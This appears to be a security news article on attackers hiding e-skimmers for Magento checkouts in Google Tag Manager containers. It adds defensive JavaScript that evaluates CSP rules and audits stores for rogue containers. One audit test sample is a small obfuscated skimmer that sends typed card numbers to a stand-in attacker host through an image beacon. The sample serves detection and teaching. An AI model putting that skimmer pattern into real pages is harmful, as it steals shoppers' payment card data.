Hackers Exploit Google Tag Manager to Deploy E-Skimmers on Magento Sites


2025-02-16

Cybercriminals Use Google’s Own Tools to Steal Credit Card Data

Researchers at Sucuri have uncovered a campaign in which attackers use Google Tag Manager (GTM) to deliver e-skimmer malware to Magento-based eCommerce sites. By placing malicious scripts inside a GTM container, the attackers get their code loaded on checkout pages through Google's own loader and use it to steal credit card data as customers enter it.

GTM is a legitimate Google service that helps website owners manage marketing tags without modifying their site’s core code. However, cybercriminals have found a way to abuse this tool, embedding malicious JavaScript into GTM containers to evade detection.

Sucuri's investigation found that the attackers had injected the loader into the website's database, wrapped in code that looks like a standard Google Analytics or GTM snippet. That disguise is what makes detection hard: scanners and administrators alike tend to treat anything that resembles a Google snippet as benign. The technique itself is not new; in 2024, researchers documented the Magecart actor ATMZOW using GTM containers to distribute e-skimmers.

Sucuri initially identified six eCommerce websites loading the malicious GTM container (GTM-MLHK2N68). By the time of its latest report, three of them were still serving it.

How the Attack Works:

  • The attackers place an obfuscated JavaScript payload in a GTM container (a custom HTML tag), so it is delivered through the legitimate gtm.js loader rather than through a file on the compromised server.
  • On checkout pages the script reads the credit card details the customer types into the payment form.
  • The captured data is transmitted to an external server controlled by the attackers.
  • The payload is Base64-encoded and run through an obfuscator (renamed identifiers and arithmetic-based lookups), so the readable skimmer code never appears in the container or the page source.
  • The loader snippet stored in the site's database is written to look like an ordinary Google Analytics or GTM tag, so the skimmer runs without drawing attention.

This GTM-based attack highlights the growing sophistication of modern cyber threats, where hackers exploit trusted platforms to distribute malware. Sucuri warns that detecting such threats requires deep forensic analysis to uncover hidden scripts and malicious payloads.

What Undercode Says:

The use of Google Tag Manager (GTM) as a malware delivery system is an alarming trend that underscores the evolving tactics of cybercriminals. Here’s why this attack is particularly dangerous and what it means for the future of cybersecurity.

1. Legitimate Tools Are Becoming Cyber Weapons

Google Tag Manager was built to help businesses streamline analytics and marketing. However, attackers abuse the trust associated with Google’s services, making it difficult for security solutions to detect threats. Security teams must rethink traditional “trusted” platforms and introduce stricter validation processes.

2. E-Skimmers Are a Growing Threat to E-Commerce

Magecart groups have been running e-skimming attacks for years, and this abuse of GTM shows that the threat is not slowing down. Any online store that processes payments is a target. Businesses must take proactive measures to protect their checkout pages.

3. Obfuscation and Encoding Make Detection Harder

The attackers used Base64 encoding, obfuscator-style renamed identifiers (such as _0x5cdc), and a loader disguised as a Google Analytics script to hide their malware. Signature-based scans keyed on readable strings will not catch code in this form. Security analysts need detection that flags obfuscated scripts by their structure (encoded literals, decode calls, outbound requests from the checkout page) rather than by known content.

4. A Shift in Cybersecurity Strategy Is Needed

Relying solely on firewalls and signature-based detection is no longer enough. Companies should implement:
– Behavioral analysis to detect anomalies in website scripts.
– Regular integrity checks on GTM containers and external scripts.
– Content Security Policies (CSPs) that restrict where scripts may load from and, just as important, where the checkout page may send data.
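The permissive and the hardened policy side by side, as an added example written for this page (it is not code from the article or from Sucuri): a minimal CSP evaluator in Node.js that parses a policy header, applies the spec's source-matching rules, and checks whether a skimmer running from a GTM container could still reach an exfiltration host. The store origin (shop.example), the payment provider (pay.example-psp.test), the attacker host (collect.attacker.test), the nonce value and the container ids are all constructed for the example.

```javascript
// Added example, not code from the article or from Sucuri: a minimal
// Content-Security-Policy evaluator that compares a permissive policy with a
// hardened one against the exfiltration step of a GTM-hosted skimmer.
// All origins below (shop.example, pay.example-psp.test, collect.attacker.test)
// and the nonce are constructed for the example.

// Parse a CSP header value into { directiveName: [sourceExpressions] }.
function parseCsp(policy) {
  const directives = {};
  for (const part of policy.split(";")) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    if (name) directives[name.toLowerCase()] = sources;
  }
  return directives;
}

// Match one source expression against a URL. Covers 'self', '*', scheme-only
// sources (https:) and host sources with an optional "*." prefix. Other quoted
// keywords ('unsafe-inline', 'nonce-...') never match a URL. The query string is
// ignored, as the CSP spec requires, so a policy can allow
// www.googletagmanager.com/gtm.js but cannot pin ?id=GTM-... to one container.
function sourceMatches(source, url, pageOrigin) {
  if (source === "'self'") return url.origin === pageOrigin;
  if (source.startsWith("'")) return false;
  if (source === "*") return true;
  if (/^[a-z][a-z0-9+.-]*:$/i.test(source)) return url.protocol === source.toLowerCase();
  const wildcard = source.startsWith("*.") || source.includes("://*.");
  const pattern = wildcard ? source.replace("*.", "") : source;
  let expr;
  try {
    // Simplification: a host source without a scheme is matched with the target's scheme.
    expr = new URL(pattern.includes("://") ? pattern : `${url.protocol}//${pattern}`);
  } catch {
    return false;
  }
  const hostOk = wildcard ? url.hostname.endsWith(`.${expr.hostname}`) : url.hostname === expr.hostname;
  const pathOk = expr.pathname === "/" || url.pathname.startsWith(expr.pathname);
  return url.protocol === expr.protocol && url.port === expr.port && hostOk && pathOk;
}

// Would a load governed by `directive` to `targetUrl` be allowed? Fetch directives
// fall back to default-src when absent (form-action does not); when neither is
// present everything is allowed, which is exactly the gap in the weak policy.
function allowedBy(policy, directive, targetUrl, pageOrigin) {
  const d = parseCsp(policy);
  const sources = d[directive] ?? (directive !== "form-action" ? d["default-src"] : undefined);
  if (sources === undefined) return true;
  const url = new URL(targetUrl);
  return sources.some((s) => sourceMatches(s, url, pageOrigin));
}

const PAGE_ORIGIN = "https://shop.example"; // constructed store origin

// Weak policy typical of a store that "just trusts Google": inline scripts are
// allowed and nothing limits outbound connections, so a skimmer can POST anywhere.
const WEAK_CSP = "script-src 'self' 'unsafe-inline' https://www.googletagmanager.com";

// Hardened policy: inline scripts need the page nonce, and connect-src, img-src and
// form-action are pinned to the store and its payment provider.
const HARDENED_CSP = [
  "default-src 'self'",
  "script-src 'self' 'nonce-r4nd0m' https://www.googletagmanager.com",
  "connect-src 'self' https://www.google-analytics.com https://pay.example-psp.test",
  "img-src 'self' https://www.google-analytics.com",
  "form-action 'self' https://pay.example-psp.test",
].join("; ");

const EXFIL_URL = "https://collect.attacker.test/gate.php"; // constructed attacker endpoint

// The three ways a browser-side skimmer usually ships data out.
function evaluateExfil(policy) {
  return {
    fetchAllowed: allowedBy(policy, "connect-src", EXFIL_URL, PAGE_ORIGIN),
    imgBeaconAllowed: allowedBy(policy, "img-src", EXFIL_URL, PAGE_ORIGIN),
    formPostAllowed: allowedBy(policy, "form-action", EXFIL_URL, PAGE_ORIGIN),
  };
}

console.log("weak:", evaluateExfil(WEAK_CSP));
console.log("hardened:", evaluateExfil(HARDENED_CSP));
```

Two caveats the evaluator makes visible. First, because host matching ignores the query string, script-src cannot tell the store's own container apart from a rogue one loaded from the same gtm.js URL; the policy that actually bites is the connect-src, img-src and form-action allowlist, combined with the container audit in section 6. Second, a nonce-based script-src only works with GTM custom HTML tags if the nonce is on the container snippet so GTM can propagate it to the scripts it injects; Magento 2.3.5 and later ship a Magento_Csp module, which defaults to report-only mode and has to be switched to enforce mode before it blocks anything.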

5. Google Needs to Strengthen GTM Security

While Google Tag Manager is not inherently at fault, the company must introduce stronger security controls to prevent abuse. Some suggestions include:

– Requiring stricter authentication for GTM changes.
– Enhanced monitoring for suspicious scripts.
– Automatic alerts when a GTM container loads an unknown third-party script.

6. Website Owners Must Stay Vigilant

Magento store owners and anyone using GTM should immediately:

✅ Audit all GTM containers for unauthorized scripts.

✅ Enable two-factor authentication (2FA) for GTM accounts.

✅ Monitor checkout pages for unusual script activity.

✅ Keep all eCommerce platform updates and security patches up to date.
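A first-pass audit for the indicators listed under "How the Attack Works" and for the container and checkout checks above, as an added example written for this page (not code from the article or from Sucuri's report). It takes text pulled from a store (rendered checkout HTML, exported CMS block or config content, the bodies of GTM custom HTML tags), flags GTM container ids that are not on the store's allowlist, and flags script bodies that combine an encoding or obfuscation marker with card-field access or an outbound send. The allowlisted id GTM-ABC1234, the rogue id GTM-ZZ99ZZ9, the host collect.attacker.test and all sample snippets are constructed.

```javascript
// Added example, not code from the article or from Sucuri: an offline audit over
// text pulled from a Magento store (rendered checkout HTML, exported CMS block or
// config content, the bodies of GTM custom HTML tags). It reports container ids
// that are not on the store's allowlist and script bodies that carry the
// indicators the article describes. Every sample, id and hostname is constructed.

const GTM_ID = /GTM-[A-Z0-9]{5,9}/g; // loader ids as seen in gtm.js?id=... and the <noscript> iframe

// Heuristics only: a hit is a lead for an analyst, not proof of compromise.
const ENCODING_INDICATORS = [
  { name: "obfuscated identifiers", re: /\b_0x[0-9a-f]{4,}\b/i },
  { name: "Base64 decode of literal", re: /atob\s*\(\s*['"][A-Za-z0-9+/=]{40,}['"]\s*\)/ },
  { name: "long Base64 literal", re: /['"][A-Za-z0-9+/]{120,}={0,2}['"]/ },
];
const DATA_INDICATORS = [
  { name: "card field access", re: /cc_number|card_?number|cc_cid|cvv|cvc|exp(?:iry|_month|_year)/i },
  { name: "outbound send", re: /\b(?:fetch|XMLHttpRequest|sendBeacon|new Image)\b/ },
];

function extractContainerIds(text) {
  return [...new Set(text.match(GTM_ID) ?? [])];
}

// Inline <script> bodies; text without <script> tags is treated as a single body.
function scriptBodies(text) {
  const bodies = [...text.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)].map((m) => m[1]);
  return bodies.length ? bodies : [text];
}

function auditSource(label, text, allowedContainers) {
  const findings = [];
  for (const id of extractContainerIds(text)) {
    if (!allowedContainers.has(id)) {
      findings.push({ source: label, kind: "unknown GTM container", detail: id });
    }
  }
  for (const body of scriptBodies(text)) {
    const enc = ENCODING_INDICATORS.filter(({ re }) => re.test(body)).map(({ name }) => name);
    const data = DATA_INDICATORS.filter(({ re }) => re.test(body)).map(({ name }) => name);
    // Ordinary analytics snippets send data but are not obfuscated; require both.
    if (enc.length && data.length) {
      findings.push({ source: label, kind: "skimmer indicators", detail: [...enc, ...data].join(", ") });
    }
  }
  return findings;
}

function auditStore(sources, allowedContainers) {
  return sources.flatMap(({ label, text }) => auditSource(label, text, allowedContainers));
}

// Constructed inputs: one legitimate loader, one look-alike loader pointing at a
// rogue container, one custom HTML tag body with Base64-hidden field names and an
// image-beacon exfil, and one plain gtag snippet that must not be flagged.
const ALLOWED_CONTAINERS = new Set(["GTM-ABC1234"]);
const SAMPLES = [
  { label: "checkout page head", text:
    `<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s);j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-ABC1234');</script>` },
  { label: "cms block footer", text:
    `<script>/* footer tracking */(function(w,d,s,l,i){w[l]=w[l]||[];var j=d.createElement(s);j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i;d.head.appendChild(j);})(window,document,'script','dataLayer','GTM-ZZ99ZZ9');</script>` },
  { label: "GTM custom HTML tag", text:
    `<script>var _0x5cdc=['Y2NfbnVtYmVy','Y2NfY2lk'];var _0x4f=function(a){return atob(a)};document.querySelector('#'+_0x4f(_0x5cdc[0])).addEventListener('change',function(e){new Image().src='https://collect.attacker.test/g?d='+btoa(e.target.value)});</script>` },
  { label: "legit analytics", text:
    `<script>window.dataLayer=window.dataLayer||[];function gtag(){dataLayer.push(arguments)}gtag('js',new Date());gtag('config','G-XXXX');</script>` },
];

console.log(JSON.stringify(auditStore(SAMPLES, ALLOWED_CONTAINERS), null, 2));
```

The third sample shows why a grep for "cc_number" is not enough: the field names are Base64-encoded (Y2NfbnVtYmVy decodes to cc_number), so only the structural markers, the _0x identifier and the image beacon, give it away. In practice the inputs would come from the rendered checkout page, a dump of the Magento cms_block and core_config_data content, and the container's custom HTML tags exported from the GTM admin; anything the audit flags should then be checked against the change history in GTM's version list.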

7. The Future of Cyber Attacks Will Be Even More Subtle

This attack demonstrates how cybercriminals are shifting towards stealthier techniques by leveraging trusted third-party services. In the future, we can expect:

– More attacks using cloud-based marketing tools (e.g., Google Analytics, Facebook Pixel).
– Automated attacks that adapt to security updates in real time.
– AI-assisted obfuscation that rewrites payloads so that signatures stop matching.

Final Thoughts

The exploitation of Google Tag Manager is a wake-up call for businesses and security professionals. If a tool is widely trusted, hackers will find a way to exploit it. E-commerce sites must increase monitoring of third-party scripts and adopt advanced security measures to stay ahead of evolving cyber threats.

References:

Reported By: https://securityaffairs.com/174085/cyber-crime/google-tag-manager-gtm-e-skimmer-software-in-magento.html